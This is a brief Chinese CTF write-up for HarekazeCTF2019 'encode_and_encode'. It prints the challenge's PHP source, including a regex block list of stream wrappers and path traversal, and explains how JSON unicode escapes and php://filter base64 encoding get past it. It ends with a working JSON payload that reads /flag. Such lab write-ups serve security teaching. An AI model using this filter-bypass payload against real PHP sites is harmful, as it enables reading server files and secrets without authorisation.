# [HarekazeCTF2019]encode_and_encode
直接看代码:
<?php | |
error_reporting(0); | |
if (isset($_GET['source'])) { | |
show_source(__FILE__); | |
exit(); | |
} | |
function is_valid($str) { | |
$banword = [ | |
// no path traversal | |
'\.\.', | |
// no stream wrapper | |
'(php|file|glob|data|tp|zip|zlib|phar):', | |
// no data exfiltration | |
'flag' | |
]; | |
$regexp = '/' . implode('|', $banword) . '/i'; | |
if (preg_match($regexp, $str)) { | |
return false; | |
} | |
return true; | |
} | |
$body = file_get_contents('php://input'); | |
$json = json_decode($body, true); | |
if (is_valid($body) && isset($json) && isset($json['page'])) { | |
$page = $json['page']; | |
$content = file_get_contents($page); | |
if (!$content || !is_valid($content)) { | |
$content = "<p>not found</p>\n"; | |
} | |
} else { | |
$content = '<p>invalid request</p>'; | |
} | |
// no data exfiltration!!! | |
$content = preg_replace('/HarekazeCTF\{.+\}/i', 'HarekazeCTF{<censored>}', $content); | |
echo json_encode(['content' => $content]); |
简单来说就是根据我们传入的 POST 数据作为 json 解析去读取文件,但是过滤了相关关键字,并对结果也进行过滤。
json 解析时的关键字过滤可以采用 unicode 编码,json 是支持用 unicode 编码直接表示对应字符的,如下两个写法是等价的。
{"poc":"php"} | |
{"poc":"\u0070\u0068\u0070"} |
至于结果的过滤就好办了,采用 php 伪协议的 filter 进行下 base64 编码就好了,最终构造如下 payload:
{"page":"\u0070\u0068\u0070://filter/convert.base64-encode/resource=/\u0066\u006c\u0061\u0067"} |
赛博厨子秒了
